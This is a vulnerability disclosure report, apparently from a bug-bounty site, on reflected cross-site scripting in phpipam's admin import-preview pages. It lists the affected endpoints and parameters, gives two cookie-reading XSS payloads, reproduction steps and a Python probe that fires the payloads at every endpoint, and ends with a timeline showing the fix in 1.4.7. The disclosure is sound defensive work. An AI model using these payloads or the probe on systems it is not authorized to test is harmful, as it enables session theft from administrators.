Cross-site Scripting (XSS) - Reflected in phpipam/phpipam

Valid

Reported on

Feb 4th 2022


Description

A reflected cross-site scripting vulnerability in the Import/Export data set feature. Values submitted to the import preview pages, both the cell contents of an uploaded spreadsheet (xls) file and the POST parameters of the preview request itself, are rendered into the preview page unescaped. An attacker who gets an administrator to preview a crafted spreadsheet (or to submit a crafted preview request) can therefore execute arbitrary JavaScript in that administrator's browser.

Proof of Concept

Endpoint

1 POST http://{HOST}/app/admin/import-export/import-vlan-preview.php

2 POST http://{HOST}/app/admin/import-export/import-subnets-preview.php

3 POST http://{HOST}/app/admin/import-export/import-vrf-preview.php

4 POST http://{HOST}/app/admin/import-export/import-ipaddr-preview.php

5 POST http://{HOST}/app/admin/import-export/import-devtype-preview.php

6 POST http://{HOST}/app/admin/import-export/import-devices-preview.php

7 POST http://{HOST}/app/admin/import-export/import-l2dom-preview.php

~

Affected parameter:

Note: essentially every parameter of each of these endpoints is affected, for example:

reqfields, filetype, importFields__name, importFields__number, importFields__description, importFields__domain etc

~

Payload:

/**/<script>alert(document.cookie)</script>

'><details/open/ontoggle=confirm(document.cookie)>

~

Steps to reproduce:

1 Log in as admin.

2 Click Administration > Import/Export.

3 Select the appropriate data set.

4 Click the Import button and upload an xls file that follows the data set's template, with the XSS payloads placed in its cells.

5 Click the Preview button; the cell values are rendered into the preview page unescaped and the XSS fires.
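The steps above exercise the spreadsheet upload path by hand. The affected-parameter list shows that the preview endpoints also reflect their own POST parameters, which is easier to check automatically. The script below is an added example, not part of the original report or of phpipam: it builds one POST per endpoint/parameter/payload combination from the lists given above and classifies each response as reflecting the payload raw (the finding), escaped (the fix is in place for tag injection) or not at all. The host, the admin session cookie string, the filler value "probe" for the other parameters and the form-encoded body (rather than a file upload) are assumptions; only the endpoint paths, parameter names and payloads come from the report.

```python
import html
import sys
import urllib.error
import urllib.parse
import urllib.request

# Endpoint paths, parameter names and payloads are taken from the report;
# host, session cookie and filler values are assumptions of this example.
PREVIEW_ENDPOINTS = [
    "/app/admin/import-export/import-vlan-preview.php",
    "/app/admin/import-export/import-subnets-preview.php",
    "/app/admin/import-export/import-vrf-preview.php",
    "/app/admin/import-export/import-ipaddr-preview.php",
    "/app/admin/import-export/import-devtype-preview.php",
    "/app/admin/import-export/import-devices-preview.php",
    "/app/admin/import-export/import-l2dom-preview.php",
]

AFFECTED_PARAMS = [
    "reqfields", "filetype", "importFields__name",
    "importFields__number", "importFields__description", "importFields__domain",
]

PAYLOADS = [
    "/**/<script>alert(document.cookie)</script>",
    "'><details/open/ontoggle=confirm(document.cookie)>",
]


def build_request(host, endpoint, param, payload, session_cookie):
    """Build the preview POST with a single affected parameter carrying the
    payload; every other listed parameter gets a harmless filler value."""
    form = {name: "probe" for name in AFFECTED_PARAMS}
    form[param] = payload
    req = urllib.request.Request(
        host.rstrip("/") + endpoint,
        data=urllib.parse.urlencode(form).encode(),
        method="POST",
    )
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    # The preview pages live under the admin area, so an admin session is needed
    # (the cookie string itself, e.g. "phpipam=<session id>", is an assumption).
    req.add_header("Cookie", session_cookie)
    return req


def classify_reflection(body, payload):
    """'raw' if the payload comes back verbatim (exploitable), 'escaped' if its
    tag characters come back as HTML entities, 'none' otherwise. A leading
    quote is ignored when looking for the escaped form, because PHP's
    htmlspecialchars() encodes single quotes only with certain flags."""
    if payload in body:
        return "raw"
    if html.escape(payload.lstrip("'\""), quote=False) in body:
        return "escaped"
    return "none"


def probe(host, session_cookie, opener=urllib.request.urlopen):
    """Send every endpoint/parameter/payload combination through `opener`
    and return the (endpoint, param, payload) triples reflected unescaped."""
    findings = []
    for endpoint in PREVIEW_ENDPOINTS:
        for param in AFFECTED_PARAMS:
            for payload in PAYLOADS:
                req = build_request(host, endpoint, param, payload, session_cookie)
                try:
                    with opener(req) as resp:
                        body = resp.read().decode("utf-8", "replace")
                except urllib.error.URLError:
                    body = ""  # unreachable endpoint or HTTP error: nothing reflected
                if classify_reflection(body, payload) == "raw":
                    findings.append((endpoint, param, payload))
    return findings


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: probe.py http://{HOST} '<admin session cookie>'")
    for endpoint, param, payload in probe(sys.argv[1], sys.argv[2]):
        print(f"unescaped reflection: {endpoint} param={param} payload={payload}")
```

A "raw" hit shows the preview page echoes the value without HTML encoding, which is the defect the fix in 1.4.7 addresses; it is a server-side check, not proof of execution in a particular browser context, so confirm with the manual steps above. A version that returns only "escaped" or "none" for every combination is the expected result after the fix.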

~

~

List of xls files containing the XSS payloads:

Impact

This vulnerability can be used to deface pages of the application, run malicious JavaScript in the context of the phpipam web pages, and steal a user's session cookie, giving the attacker unauthorized access to that user's account. Because the import preview lives under the admin area and the steps above start from an admin login, the victim is an administrator who previews a crafted spreadsheet or is tricked into submitting the crafted preview request.

We are processing your report and will contact the phpipam team within 24 hours. a year ago
Faisal Fs ⚔️ modified the report
a year ago
We have contacted a member of the phpipam team and are waiting to hear back a year ago
We have sent a follow up to the phpipam team. We will try again in 7 days. a year ago
We have sent a second follow up to the phpipam team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the phpipam team. This report is now considered stale. a year ago
phpipam/phpipam maintainer has acknowledged this report a year ago
garyallan validated this vulnerability a year ago
Faisal Fs ⚔️ has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the phpipam team. We will try again in 7 days. a year ago
We have sent a second fix follow up to the phpipam team. We will try again in 10 days. a year ago
We have sent a third and final fix follow up to the phpipam team. This report is now considered stale. a year ago
garyallan marked this as fixed in 1.4.7 with commit 50e36b a year ago
garyallan has been awarded the fix bounty
This vulnerability will not receive a CVE